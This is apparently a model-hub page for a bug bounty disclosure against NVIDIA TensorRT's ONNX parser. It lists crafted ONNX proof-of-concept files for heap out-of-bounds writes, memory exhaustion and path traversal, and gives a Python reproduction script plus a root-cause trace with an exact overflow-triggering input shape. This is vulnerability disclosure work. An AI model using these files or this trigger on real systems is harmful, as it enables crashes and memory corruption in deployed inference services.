TensorRT ONNX Parser - Security PoC Models

Bug bounty research submission to huntr.com targeting NVIDIA TensorRT ONNX parser.

Vulnerabilities

File Vulnerability CWE Severity
eyelike_overflow.onnx Integer overflow -> heap OOB write in EyeLike op CWE-190, CWE-122 Critical
eyelike_small_overflow.onnx Same bug, faster crash trigger CWE-190, CWE-122 Critical
external_oom_length.onnx Uncapped length field -> OOM denial of service CWE-770 High
external_abs_path.onnx Absolute path traversal bypass in external weights CWE-22 Medium
external_neg_offset.onnx Negative seek offset in external weights CWE-20 Medium
external_oob_offset.onnx Read past EOF - uninitialized buffer risk CWE-125 Medium

Reproduce (Finding 1 - Heap OOB Write)

import tensorrt as trt

logger = trt.Logger(trt.Logger.VERBOSE)
builder = trt.Builder(logger)
network = builder.create_network(
    1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
parser = trt.OnnxParser(network, logger)

with open("eyelike_overflow.onnx", "rb") as f:
    parser.parse(f.read())
# Expected: SIGSEGV / heap-buffer-overflow

Root Cause (Finding 1)

// onnxOpImporters.cpp - EyeLike importer
int totalWeights = dims.d[0] * dims.d[1];  // int32 overflow! dims are int64_t
std::vector<int> values(totalWeights);      // undersized allocation
for (int32_t r = 0; r < dims.d[0]; ++r)
    for (int32_t c = 0; c < dims.d[1]; ++c)
        values[r * dims.d[1] + c] = 0;     // OOB WRITE

Trigger: input shape [65537, 65536]

  • True product: 4,295,032,832 (overflows int32)
  • int32 truncated: 65,536 (vector too small)
  • First OOB write: r=1, c=0 -> index 65,536
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support